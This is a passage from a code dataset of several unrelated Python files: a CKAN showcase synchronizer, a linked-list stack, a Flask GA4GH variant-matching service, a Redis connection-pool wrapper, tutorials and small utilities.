argparse\nimport os\nimport re\nimport requests\nimport sys\n\nfrom ckanapi import RemoteCKAN, NotFound\n\n\nclass ShowcaseMetadata(dict):\n \"\"\"Copy of CKAN shocase dict containing only non-internal attributes\n and with sorted extras and tags lists. That allows simple comparison\n with other instances.\n \"\"\"\n def __init__(self, showcase_meta_dict):\n super().__init__()\n keys = [\n 'author',\n 'author_email',\n 'name',\n 'notes',\n 'state',\n 'title',\n 'type',\n 'url',\n ]\n self.update({k: showcase_meta_dict.get(k) for k in keys})\n tags = [\n {k: td.get(k) for k in ['display_name', 'name', 'state']}\n for td in showcase_meta_dict.get('tags', [])]\n #self.update({\n # 'tags': sorted(tags, key=lambda x: x['display_name']),\n #})\n self._image_url = showcase_meta_dict.get('image_display_url')\n if self._image_url:\n full_image_name = os.path.basename(self._image_url)\n self._image_name = re.sub(r'^[\\d-]+\\.\\d{6}', '', full_image_name)\n else:\n self._image_name = ''\n\n\nclass ShowcaseUpdater:\n def __init__(self, source_repo, target_repo, tmp_dir):\n self.source_repo = source_repo\n self.target_repo = target_repo\n self.tmp_dir = tmp_dir\n\n def sync_showcases(self):\n source_names = [\n sc['name'] for sc in self.source_repo.action.ckanext_showcase_list()]\n for sc_name in source_names:\n source_sc = self.source_repo.action.ckanext_showcase_show(\n id=sc_name)\n source_sc_meta = ShowcaseMetadata(source_sc)\n try:\n target_sc = self.target_repo.action.ckanext_showcase_show(\n id=sc_name)\n except NotFound: # showcase not found -> create it\n image_dict = self.prepare_image_dict(\n source_sc_meta._image_url, source_sc_meta._image_name)\n source_sc_meta.update(image_dict)\n self.target_repo.action.ckanext_showcase_create(**source_sc_meta)\n else: # showcase found -> compare (and update metadata)\n target_sc_meta = ShowcaseMetadata(target_sc)\n needs_update = (source_sc_meta != target_sc_meta or\n source_sc_meta._image_name != target_sc_meta._image_name)\n if needs_update:\n image_dict = self.prepare_image_dict(\n source_sc_meta._image_url, source_sc_meta._image_name)\n source_sc_meta.update(image_dict)\n self.target_repo.action.ckanext_showcase_update(**source_sc_meta)\n self.sync_datasets(sc_name)\n \n def prepare_image_dict(self, image_url, image_name):\n image_dict = {'image_url': ''}\n if image_url.startswith(self.source_repo.address):\n image_file = self.download_file(image_url, image_name)\n image_dict['image_upload'] = open(image_file, 'rb')\n else: # external image\n image_dict['image_url'] = image_url\n return image_dict\n\n\n def download_file(self, url, filename):\n location = os.path.join(self.tmp_dir, filename)\n r = requests.get(url)\n with open(location, 'wb') as fd:\n for chunk in r.iter_content(4096):\n fd.write(chunk)\n return location\n\n def sync_datasets(self, showcase_name):\n def get_dataset_list(repo, showcase_name):\n return [\n package['name'] for package in\n repo.action.ckanext_showcase_package_list(\n showcase_id=showcase_name)]\n\n source_datasets = get_dataset_list(self.source_repo, showcase_name)\n target_datasets = get_dataset_list(self.target_repo, showcase_name)\n\n for dataset in source_datasets:\n if dataset not in target_datasets:\n self.target_repo.action.ckanext_showcase_package_association_create(\n showcase_id=showcase_name, package_id=dataset)\n\n for dataset in target_datasets:\n if dataset not in source_datasets:\n self.target_repo.action.ckanext_showcase_package_association_delete(\n showcase_id=showcase_name, package_id=dataset)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='CKAN showcases synchronization')\n parser.add_argument('--source', help='source repo URL')\n parser.add_argument('--target', help='target repo URL')\n parser.add_argument('--target-key', help='target API key')\n parser.add_argument('--tmp-dir', help='tmp dir for images', default='/tmp/')\n\n args = parser.parse_args()\n if not all(vars(args).values()):\n parser.print_help()\n sys.exit(1)\n\n source_repo = RemoteCKAN(args.source)\n target_repo = RemoteCKAN(args.target, args.target_key)\n updater = ShowcaseUpdater(source_repo, target_repo, args.tmp_dir)\n updater.sync_showcases()\n","repo_name":"janaslo/ckan-sync-showcases","sub_path":"sync_showcase.py","file_name":"sync_showcase.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8025727198","text":"\"\"\"\nThis is a stack created by a linked list. This will be used for\nthe text editor logic.\n\"\"\"\nclass Stack:\n \"\"\"Class used with a first in first out basis. Uses a linked list as the data structure\"\"\"\n\n def __init__(self, initStack=[]):\n \"\"\"Initializer for the stack class. Defualts with an empty linked list\"\"\"\n self.head = None\n if not isinstance(initStack, list):\n raise ValueError(\"When initializing the stack, you must use a list object\")\n if initStack: #If there are items in the stack\n for i in initStack[::-1]:\n self.append(i)\n\n class __Node:\n \"\"\"A private node class used as the data points in the linked list\"\"\"\n def __init__(self, data, next = None):\n \"\"\"Initializer for the Node\"\"\"\n self.data = data\n self.next = next\n\n def append(self, item):\n \"\"\"Adds an item to the stack\"\"\"\n self.head = self.__Node(item, self.head)\n\n def pop(self):\n \"\"\"Removes the top element in the stack and returns the value\"\"\"\n if self.head is None:\n raise IndexError(\"You can't use pop() with no elements in the stack\")\n tmp = self.head\n self.head = self.head.next\n return tmp.data\n\n def peek(self):\n \"\"\"Returns, but doesn't remove, the top element from the stack\"\"\"\n if self.head is None:\n raise IndexError(\"You can't use peek() with no elements in the stack\")\n tmp = self.head.data\n return tmp\n \n def __str__(self):\n \"\"\"Returns the stack as a string object\"\"\"\n output = \"[\"\n if self.head is None:\n return output + \"]\"\n cursor = self.head\n while cursor.next is not None:\n if isinstance(cursor.data, str):\n output += \"'\" + str(cursor.data) + \"', \"\n else:\n output += str(cursor.data) + \", \"\n cursor = cursor.next\n if cursor.next is None:\n if isinstance(cursor.data, str):\n output += \"'\" + str(cursor.data) + \"'\"\n else:\n output += str(cursor.data)\n return output + \"]\"\n \n def __repr__(self):\n \"\"\"Returns the stack as a string\"\"\"\n output = \"[\"\n if self.head is None:\n return output + \"]\"\n cursor = self.head\n while cursor.next is not None:\n if isinstance(cursor.data, str):\n output += \"'\" + str(cursor.data) + \"', \"\n else:\n output += str(cursor.data) + \", \"\n cursor = cursor.next\n if cursor.next is None:\n if isinstance(cursor.data, str):\n output += \"'\" + str(cursor.data) + \"'\"\n else:\n output += str(cursor.data)\n return output + \"]\"\n\n def __len__(self):\n \"\"\"Returns the length of the stack\"\"\"\n cursor = self.head\n length = 0\n while cursor is not None:\n length += 1\n cursor = cursor.next\n return length\n","repo_name":"PorterDalton1/Text_Editor","sub_path":"textStack.py","file_name":"textStack.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11372974901","text":"from rdflib import Literal\nfrom restriction.abstract_restriction import NameRestriction\nfrom restriction.physcial_restriction import PhyscialCharacteristicRestriction\nfrom restriction.conceptual_restriction import ConceptualCharacteristicRestriction\n\nclass EquivalentClass:\n def __init__(self,restrictions=[]):\n self.restrictions = restrictions\n\nclass EquivalentProperty:\n def __init__(self,equivalents):\n self.equivalents = equivalents\n\nclass PhysicalEquivalent(EquivalentClass):\n def __init__(self,restrictions=[]):\n if restrictions == []:\n r = [PhyscialCharacteristicRestriction()]\n else:\n r = restrictions\n super().__init__(r)\n \nclass ConceptualEquivalent(EquivalentClass):\n def __init__(self,restrictions=[]):\n if restrictions == []:\n r = [ConceptualCharacteristicRestriction()]\n else:\n r = restrictions\n super().__init__(r)\n\nclass NameEquivalentClass(EquivalentClass):\n def __init__(self, names):\n if not isinstance(names,list):\n names = [names]\n r = [NameRestriction(names)]\n super().__init__(restrictions=r)\n\nclass NameEquivalentProperty(EquivalentProperty):\n def __init__(self, names):\n if not isinstance(names,list):\n names = [names]\n names = [Literal(n) for n in names]\n super().__init__(names)","repo_name":"intbio-ncl/genet2","sub_path":"app/graph/utility/model/nv_graph_build/equivalent/abstract_equivalent.py","file_name":"abstract_equivalent.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18111868661","text":"#dfs는 stack, 재귀함수\n\ndef dfs(graph, v, visited):\n #현재 노드를 방문 처리\n visited[v] = True\n print(v, end=' ')\n\n #현재 노드와 연결된 다른 노드를 재귀적으로 방문\n for i in graph[v]:\n if not visited[i]:\n dfs(graph,i, visited)\n\ngraph = [\n [],\n [2,3,8],\n [1,7],\n [1,4,5],\n [3,5],\n [3,4],\n [7],\n [2,6,8],\n [1,7]\n]\n\nvisited = [False]*9\n\ndfs(graph,1, visited)\n","repo_name":"DaAlG/code_studying","sub_path":"seojin/개별문제/0117/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"24660574123","text":"\"\"\"add_crawler_table\n\nRevision ID: bba37bac95b0\nRevises: 444c7f1a4166\nCreate Date: 2021-03-09 02:58:04.265958\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'bba37bac95b0'\ndown_revision = '444c7f1a4166'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n\top.create_table('crawler',\n\t\tsa.Column('path_id', sa.Integer(), nullable=False),\n\t\tsa.Column('updated_dttm', postgresql.TIMESTAMP(), server_default=sa.text('to_timestamp(0)'), nullable=False),\n\t\tsa.ForeignKeyConstraint(['path_id'], ['path.path_id'], ondelete=\"CASCADE\"),\n\t\tsa.PrimaryKeyConstraint('path_id'),\n\t\tschema='scans'\n\t)\n\top.create_index(op.f('ix_scans_crawler_updated_dttm'), 'crawler', ['updated_dttm'], unique=False, schema='scans')\n\top.execute(\"\"\"\n\t\tCREATE TRIGGER host_audit\n\t\tAFTER INSERT OR UPDATE OR DELETE ON scans.crawler\n\t\tFOR EACH ROW EXECUTE PROCEDURE audit.if_modified_func();\n\t\"\"\")\n\n\n\ndef downgrade():\n\top.drop_table('crawler', schema='scans')\n","repo_name":"IMEsec-USP/VuMoS","sub_path":"src/alembic/alembic/versions/20210309025804_bba37bac95b0_add_crawler_table.py","file_name":"20210309025804_bba37bac95b0_add_crawler_table.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31262175852","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 16 09:41:53 2020\r\n\r\n@author: Mynuddin\r\n\"\"\"\r\nclass Person:\r\n def __init__(self,fname , lname , age):\r\n #instance variables\r\n self.fname = fname\r\n self.lname = lname\r\n self.age = age\r\n \r\n def fulname(self):# instance method\r\n return f\"{self.fname }{self.lname}\"\r\n \r\n def is_above(self): #instance method work for every instance or object\r\n return self.age>18\r\n \r\n \r\n \r\n \r\n \r\nP1 = Person(\"Mynuddin \",\"Hasan\",21)\r\nP2 = Person(\"Tanzia islam \",\"Mim\",20)\r\n\r\nprint(P1.fulname())\r\nprint(P2.fulname())\r\n\r\nprint(Person.fulname(P1)) # P1----> self as an object\r\nprint(Person.fulname(P2))\r\n\r\nprint(P1.is_above())\r\n\r\n\r\n\r\nl=[1,2,3,4] # here l is an object of List \r\n\r\n# lets clear or pop method\r\nprint(l.pop())\r\nprint(list.pop(l))\r\n#list predefine class\r\nlist.append(l,10)\r\nprint(l)\r\n\r\n\r\n\r\n\r\n\r\n#exercise 190\r\n\r\nclass Computer:\r\n def __init__(self,b_name,m_name,Price): \r\n # instance variables\r\n self.brand_name=b_name\r\n self.model_name = m_name\r\n self.Price = Price\r\n #self.brand_mpdel_name= b_name , m_name youcan also do it\r\n \r\n \r\n def percentage(self,num):\r\n off_price = (num/100)*self.Price\r\n return self.Price - off_price\r\n \r\n # def percentage1(self):\r\n # return self.Price - (10/100)*self.Price\r\n \r\n \r\ncomp1=Computer(\"HP\",\"corei5 8GB 1TB HDD\",63000) \r\ncomp2=Computer(\"ASUS\",\"corei7 16GB 1TB HDD\",83000)\r\n\r\nprint(comp1.brand_name , comp1.model_name ,comp1.Price,\"TK\")\r\n\r\nprint(comp1.percentage(10))\r\nprint(comp2.percentage(10))\r\n\r\n#print(comp1.percentage1())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# -----------------------------class variable-----------------------------\r\n\r\n\r\nclass Computer:\r\n \r\n percent =10 # class variable --> sharable for every object\r\n \r\n def __init__(self,b_name,m_name,Price): \r\n \r\n # instance variables difference for every object \r\n \r\n self.brand_name=b_name\r\n self.model_name = m_name\r\n self.Price = Price\r\n #self.brand_mpdel_name= b_name , m_name youcan also do it\r\n \r\n \r\n def percentage(self):\r\n off_price = (Computer.percent/100)*self.Price\r\n return self.Price - off_price\r\n \r\n # def percentage1(self):\r\n # return self.Price - (10/100)*self.Price\r\n \r\n \r\ncomp1=Computer(\"HP\",\"corei5 8GB 1TB HDD\",63000) \r\ncomp2=Computer(\"ASUS\",\"corei7 16GB 1TB HDD\",83000)\r\n\r\nprint(comp1.brand_name , comp1.model_name ,comp1.Price,\"TK\")\r\n\r\nprint(comp1.percentage())\r\n\r\nprint(comp1.__dict__)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Another Example\r\n \r\nclass Circle:\r\n \r\n pi=3.1415 # class variable --> sharable for every object\r\n\r\n def __init__(self,radious):\r\n self.radious=radious\r\n \r\n def area(self):\r\n return (2*self.radious*Circle.pi)\r\n\r\nc1 = Circle(10)\r\nc2 = Circle(20)\r\n\r\nprint(c1.area())\r\nprint(c2.area())\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Another Example from Navin\r\n\r\nclass Employee:\r\n increment=1.5 #class variable ---> sharable \r\n no_of_employee=0\r\n def __init__(self,fname,lname,salary):\r\n self.fname=fname \r\n self.lname=lname\r\n self.salary=salary\r\n self.increment=1.4 #instance variable\r\n Employee.no_of_employee +=1\r\n \r\n def increase(self):\r\n #self.salary = self.salary*Employee.increment #use class variable\r\n #self.salary = self.salary*self.increment #first search in instance\r\n #variable if not find take\r\n #class variable\r\n\r\n self.salary = self.salary*self.increment\r\nprint(Employee.no_of_employee)\r\nharray=Employee(\"Harry\",\"Potter\",44000)\r\nprint(Employee.no_of_employee)\r\nrohan=Employee(\"Rohan\",\"Sharma\",55000) \r\nprint(Employee.no_of_employee)\r\n\r\n \r\nprint(harray.salary)\r\nharray.increase()\r\nprint(harray.salary) \r\n\r\nprint(harray.__dict__) #instance variable print \r\nprint(rohan.__dict__)\r\n\r\n\r\n\r\n\r\n# As like above\r\nclass Computer:\r\n \r\n percent =10 # class variable --> sharable for every object\r\n \r\n def __init__(self,b_name,m_name,Price): \r\n \r\n # instance variables difference for every object \r\n \r\n self.brand_name=b_name\r\n self.model_name = m_name\r\n self.Price = Price\r\n self.percent=20 # first check it \r\n \r\n def percentage(self):\r\n off_price = (self.percent/100)*self.Price\r\n return self.Price - off_price\r\n \r\n # def percentage1(self):\r\n # return self.Price - (10/100)*self.Price\r\n \r\n \r\ncomp1=Computer(\"HP\",\"corei5 8GB 1TB HDD\",63000) \r\ncomp2=Computer(\"ASUS\",\"corei7 16GB 1TB HDD\",83000)\r\n \r\nprint(comp1.percentage())\r\n\r\n","repo_name":"Mynuddin-dev/Practice-Python-02","sub_path":"OOPs/Instance method.,variables and class variablespy.py","file_name":"Instance method.,variables and class variablespy.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"39404972721","text":"# Title: Counting Sheep (Small)\n# Retrieved from \n# https://www.acmicpc.net/problem/9498\n\n# Q:\n# Print Score according to the interger given\n\n# A:\n\n\nimport sys\n\ndef scorePrint(score):\n if score >= 90:\n return \"A\"\n if score >= 80:\n return \"B\"\n if score >= 70:\n return \"C\"\n if score >= 60:\n return \"D\"\n return \"F\"\n\nscore = sys.stdin.readline().rstrip(\"\\n\")\nresult = scorePrint(int(score))\nprint (result)\n\n#\n# For better readability, instead of using if~, elif~ , ..., elif~, else~\n# I have used if~ return, if~ return ...\n# It still produces the same result\n","repo_name":"AliceSeo/preparationForCodingCompetition","sub_path":"print_score.py","file_name":"print_score.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37075053337","text":"from pathlib import Path\n\nfrom setuptools import find_packages, setup\n\n\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\nsetup(\n name=\"t2m\",\n version=\"0.0.2\",\n description=\"Text To Motion\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Chanhyuk Jung\",\n package_dir={\"\": \"src\"},\n packages=find_packages(where=\"src\"),\n python_requires=\">=3.7\",\n install_requires=[\n \"numpy==1.23.1\",\n \"patool\",\n \"torch\",\n \"einops\",\n \"scipy\",\n \"click\",\n \"pandas\",\n \"jsonargparse\",\n \"tqdm\",\n \"requests\",\n \"lightning>=2.0\",\n \"gdown\",\n \"requests\",\n \"matplotlib>=3.6.0\",\n \"imageio\",\n \"smplx\",\n \"chumpy\",\n \"pyrender\",\n \"shapely\",\n \"h5py\",\n \"mapbox_earcut\",\n \"pygifsicle\",\n \"dask\",\n ],\n extras_require={\n \"test\": [\"pytest\", \"pytest-xdist\"],\n \"dev\": [\"black\", \"ruff\", \"bumpver\"],\n },\n)\n","repo_name":"urw7rs/t2m","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14201343121","text":"def i2h(integer):\n hexmap = {\n 0: \"0\",\n 1: \"1\",\n 2: \"2\",\n 3: \"3\",\n 4: \"4\",\n 5: \"5\",\n 6: \"6\",\n 7: \"7\",\n 8: \"8\",\n 9: \"9\",\n 10: \"A\",\n 11: \"B\",\n 12: \"C\",\n 13: \"D\",\n 14: \"E\",\n 15: \"F\"\n }\n\n hexlist = []\n number = integer\n temp = int(number)\n while True:\n hexlist.insert(0, hexmap[temp % 16])\n temp //= 16\n if str(int(\"\".join(hexlist), 16)) == number:\n break\n\n finalhex = \"\".join(hexlist)\n #print(\"Hexidecimal '\" + number + \"' is '\" + finalhex + \"'.\")\n return(finalhex)\n\ndef h2i(hexadecimal):\n return int(hexadecimal, 16)\n \ndef a2b(msg, tofile=False):\n if not tofile:\n return (str(bin(int.from_bytes(msg.encode(), 'big')))).replace('b', '')\n else:\n with open('Binary.txt', 'w') as file:\n file.write(bin(int.from_bytes(msg.encode(), 'big')))\n\ndef b2a(binary, fromfile=False):\n if not fromfile:\n binary = binary.replace(' ', '')\n n = int(binary, 2)\n return n.to_bytes((n.bit_length() + 7) // 8, 'big').decode()\n else:\n with open('Binary.txt', 'r') as file:\n string = (file.read()).replace(\" \", \"\")\n n = int(string, 2)\n with open('Text.txt', 'w') as file:\n file.write(n.to_bytes((n.bit_length() + 7) // 8, 'big').decode())\n\n#def b2h(binary):\n #while len\n","repo_name":"Lordfirespeed/BunchaPythonStuff","sub_path":"Misc/Conversions.py","file_name":"Conversions.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3581613164","text":"from __future__ import division\nfrom flask import Flask, Response, request, render_template, session\nimport ijson\nimport requests\nimport simplejson as json\nimport collections\nimport re\nfrom gevent.pool import Pool\nfrom gevent import monkey as curious_george\nfrom functools import partial\nfrom settings import GOOGLE_API_KEY, SECRET_KEY\nfrom models import CachedReads\nfrom variant_mapper import match, get_ref_length\n\ncurious_george.patch_all()\n\napp = Flask(__name__)\napp.secret_key = SECRET_KEY\n\nREPOSITORIES = {\n 'google': 'https://www.googleapis.com/genomics/v1beta/',\n 'ncbi': 'http://trace.ncbi.nlm.nih.gov/Traces/gg/',\n 'ebi': 'http://193.62.52.16/'\n}\nMIN_DISTANCE = 100\nCoordinate = collections.namedtuple('Coordinate', 'chrom start end')\n\n\nclass HTTPStream():\n '''\n Turn requests.Response into a stream\n '''\n def __init__(self, response):\n self.response = response\n def read(self, size):\n if not hasattr(self, 'iter'):\n self.iter = iter(self.response.iter_content(chunk_size=size))\n try:\n return next(self.iter)\n except StopIteration:\n return ''\n\n\n\ndef find_cached_read(report, repository, readset_id):\n '''\n Find cached read by report \n '''\n return CachedReads.find_one({\n 'repository': repository,\n 'readsetId': readset_id,\n 'referenceSequenceName': report['chrom'],\n 'start': {'$lte': report['seqStart']},\n 'end': {'$gt': report['seqEnd']}\n })\n\n\ndef push_coordinates(coordinates, new_coord):\n '''\n Given a list of existing coordinates and a single new coordinate, return a new list of coordinates,\n optimizing search operation of reads.\n '''\n for i, coord in enumerate(coordinates):\n if coord.chrom != new_coord.chrom:\n continue\n #calculate size of the distance between two coordinates\n upper = max(coord.start, new_coord.start)\n lower = min(coord.end, new_coord.end)\n coord_index = i\n #meaning the two coordinates overlap\n if upper <= lower or (upper - lower) <= MIN_DISTANCE:\n start = min(coord.start, new_coord.start)\n end = max(coord.end, new_coord.end)\n coordinates[i] = Coordinate(coord.chrom, start, end)\n break\n else:\n coordinates.append(new_coord)\n coord_index = len(coordinates) - 1\n #coord_index tells the index of the newly inserted coordinate\n return coordinates, coord_index\n\n\ndef make_read_search(repo_id, readset_id, coordinate, coord_index):\n '''\n Construct a search on read api, return the a requests.request object\n '''\n search_data = {\n 'readsetIds': [readset_id],\n 'sequenceName': coordinate.chrom,\n 'sequenceStart': coordinate.start,\n 'sequenceEnd': coordinate.end\n }\n if repo_id == 'google':\n api_key = 'key=%s&' % GOOGLE_API_KEY\n else:\n api_key = ''\n search_url = '%sreads/search?%scoord_index=%s' % (REPOSITORIES[repo_id], api_key, coord_index)\n return requests.post(search_url,\n data=json.dumps(search_data),\n stream=True,\n headers={'Content-Type': 'application/json; charset=UTF-8'})\n\n\n\n\n@app.route('//', methods=['GET', 'POST'])\ndef ga_api(repo_id, endpoint):\n '''\n Makes GA4GH read api call for the front end.\n '''\n url = REPOSITORIES[repo_id] + endpoint\n if repo_id == 'google':\n url += '?key=%s' % GOOGLE_API_KEY\n url += '&coord_id=1'\n options = {'stream': True}\n if request.method == 'POST':\n options['data'] = request.data\n options['headers'] = {'Content-Type': 'application/json; charset=UTF-8'}\n response = requests.request(request.method, url, **options)\n return Response(response.iter_content(),\n content_type='application/json; charset=UTF-8',\n status=response.status_code)\n\n\n\ndef lookup_and_match(info):\n '''\n Lookup a report in catch and match it if found\n '''\n report, repo, readset_id = info\n matched = False\n found = False\n cached_read = find_cached_read(report, repo, readset_id)\n if cached_read:\n found = True\n if match(report, cached_read):\n matched = True\n return found, matched, report\n\n\n@app.route('/match_reports', methods=['POST'])\ndef match_reports():\n report_set = json.loads(request.data)\n coordinates = []\n coord_indices = {}\n matched_reports = []\n matching_result = []\n lookupPool = Pool(50)\n\n for found, matched, report in lookupPool.imap(lookup_and_match, \n ((r, report_set['repository'], report_set['readsetId']) \n for r in report_set['reports'])):\n if report['clinicalSignificance'] in ('Uncertain significance', 'not provided', 'conflicting data from submitters', 'other'):\n continue\n if not found:\n new_coord = Coordinate(report['chrom'], report['seqStart'], report['seqEnd'])\n coordinates, coord_index = push_coordinates(coordinates, new_coord)\n coord_indices.setdefault(coord_index, []).append(report)\n elif matched:\n matched_reports.append(report)\n\n\n read_search = partial(make_read_search,\n report_set['repository'],\n report_set['readsetId'])\n\n def search_and_match(coord_index):\n coord = coordinates[coord_index]\n result = read_search(coord, coord_index)\n reads = ijson.items(HTTPStream(result), 'reads.item')\n reports = coord_indices[coord_index]\n reports_visited = []\n for read in reads:\n read_coord = Coordinate(read['referenceSequenceName'],\n read['position'],\n read['position']+get_ref_length(read['cigar']))\n covered_reports = [report for report in reports\n if (read_coord.chrom == report['chrom'] and\n read_coord.start <= report['seqStart'] and\n read_coord.end > report['seqEnd'])]\n if covered_reports:\n new_matched_reports = [report for report in covered_reports \n if (report['reportId'] not in reports_visited and\n match(report, read))]\n matched_reports.extend(new_matched_reports)\n reports_visited.extend([report['reportId'] for report in covered_reports\n if report['reportId'] not in reports_visited])\n #push read into cache:\n read['repository'] = report_set['repository']\n read['readsetId'] = report_set['readsetId']\n read['start'] = read['position']\n read['end'] = read['position'] + get_ref_length(read['cigar'])\n CachedReads.save(read)\n if len(reports_visited) >= len(reports):\n break\n\n searchPool = Pool(50)\n (_ for _ in searchPool.imap(search_and_match, coord_indices.keys()))\n\n return Response(json.dumps(matched_reports), content_type='application/json; charset=UTF-8')\n\n\n\n\n@app.route('/register')\ndef register():\n session['repo'] = request.args['repo']\n session['dataset'] = request.args['dataset']\n session['readset'] = request.args['readset']\n return Response()\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n app_init = ''\n if session.get('repo'):\n app_init += 'currentRepo=\"%s\"; '% session['repo']\n if session.get('dataset'):\n app_init += 'currentDataset=\"%s\"; '% session['dataset']\n if session.get('readset'):\n app_init += 'currentReadset=%s; '% session['readset']\n\n if request.form.get('term'):\n searchTerms = 'mapTerm(\"%s\");'% request.form['term'];\n else:\n searchTerms = '';\n\n return render_template('index.html', app_init=app_init, searchTerms=searchTerms, term=request.form.get('term', ''))\n\n\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=7000)","repo_name":"ychen306/Variant-Mapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23033479386","text":"# -*- coding: utf-8 -*-\r\n# @Explain : \r\n# @Time : 2021/02/22 10:06 \r\n# @Author : tide\r\n# @FileName : pool\r\n\r\nimport time\r\nimport logging\r\nimport redis\r\nfrom functools import partial\r\nfrom threading import Lock\r\nfrom cachetools import LRUCache\r\nfrom redis.connection import ConnectionPool\r\nfrom common.logwriter import trace_full\r\n\r\nlogger = logging.getLogger(__name__)\r\n_pool_cache = {}\r\n_pool_lock = Lock()\r\nDB_RECONNECT_DELAY = 3\r\nMAX_ACCESS_LIMIT = 10000\r\nMAX_ACCESS_COUNT_SECONDS_RECORD = 3600\r\n\r\n\r\nclass RedisNotReadyException(Exception):\r\n pass\r\n\r\n\r\nclass RedisCommandCheckError(Exception):\r\n pass\r\n\r\n\r\ndef _shared_pool(**opts):\r\n if \"host\" in opts:\r\n key = \"{}:{}/{}\".format(opts[\"host\"], opts[\"port\"], opts[\"db\"])\r\n else:\r\n key = \"{}/{}\".format(opts[\"path\"], opts[\"db\"])\r\n pool = _pool_cache.get(key)\r\n if pool is not None:\r\n return pool\r\n with _pool_lock:\r\n pool = _pool_cache.get(key)\r\n if pool is not None:\r\n return pool\r\n pool = ConnectionPool(**opts)\r\n _pool_cache[key] = pool\r\n return pool\r\n\r\n\r\ndef db_check(func):\r\n def decorate(*args, **kwargs):\r\n self = func.keywords.pop(\"_cls\", None)\r\n for i in range(3):\r\n try:\r\n if not self.redis:\r\n raise RedisNotReadyException('[db]connection {} is not ready!!!'.format(self.db_desc()))\r\n\r\n ret = func(*args, **kwargs)\r\n now_sec = int(time.time())\r\n next_cnt = self.access_count.get(now_sec, 0) + 1\r\n self.access_count[now_sec] = next_cnt\r\n # print(\"func: {}, args: {}, kwargs: {}\".format(func.__name__, args, kwargs))\r\n if next_cnt > self.access_count_max:\r\n self.access_count_max = next_cnt\r\n logger.info('[db]connection {} access max={}'.format(self.db_desc(), next_cnt))\r\n if next_cnt >= MAX_ACCESS_LIMIT:\r\n logger.error('[db]connection {} access too fast... wait'.format(self.db_desc()))\r\n time.sleep(now_sec + 1 - time.time())\r\n return ret\r\n except RedisCommandCheckError as e:\r\n raise e\r\n except redis.exceptions.NoScriptError as e:\r\n raise e\r\n except redis.exceptions.DataError as e:\r\n raise e\r\n except RedisNotReadyException as e:\r\n self.on_except()\r\n logger.info(\"{}\".format(e))\r\n self.connect()\r\n except Exception as e:\r\n self.on_except()\r\n logger.error(trace_full())\r\n logger.error('[db]exception={} args={}'.format(e, args))\r\n self.connect()\r\n\r\n raise Exception(\"request redis is fail!\")\r\n\r\n return decorate\r\n\r\n\r\nclass Connection:\r\n def __init__(self, host=\"127.0.0.1\", port=6379, password=None, db=0):\r\n self.create_time = 0\r\n self.access_count = LRUCache(maxsize=MAX_ACCESS_COUNT_SECONDS_RECORD)\r\n self.access_count_max = 1000\r\n self.cfg = {\"host\": host, \"port\": port, \"db\": db, \"password\": password, \"socket_keepalive\": True}\r\n self.pool = None\r\n self.redis = None\r\n self.reconnecting = False\r\n self.connect()\r\n\r\n def db_desc(self):\r\n return \"[{}:{}/{}]\".format(self.cfg[\"host\"], self.cfg[\"port\"], self.cfg[\"db\"])\r\n\r\n def on_except(self):\r\n if self.pool:\r\n self.pool.disconnect()\r\n self.pool = None\r\n\r\n self.redis = None\r\n self.reconnecting = False\r\n\r\n def connect(self):\r\n while self.redis is None:\r\n while self.reconnecting:\r\n logger.info('[db]reconnecting to {} is still in process, just wait.'.format(self.db_desc()))\r\n time.sleep(DB_RECONNECT_DELAY)\r\n\r\n if self.redis:\r\n return\r\n\r\n try:\r\n self.reconnecting = True\r\n while True:\r\n dif = abs(time.time() - self.create_time)\r\n if dif >= DB_RECONNECT_DELAY:\r\n break\r\n\r\n wait = DB_RECONNECT_DELAY - dif\r\n logger.info('[db]reconnect to {} need wait {} seconds'.format(self.db_desc(), wait))\r\n time.sleep(wait)\r\n\r\n self.create_time = time.time()\r\n logger.info('[db]connecting to {}.'.format(self.db_desc()))\r\n self.pool = _shared_pool(**self.cfg)\r\n self.redis = redis.StrictRedis(connection_pool=self.pool)\r\n key = 'redis_db_test_key'\r\n self.redis.set(key, self.create_time)\r\n v = self.redis.get('redis_db_test_key')\r\n if not v:\r\n raise Exception(\"test db error\")\r\n\r\n self.reconnecting = False\r\n 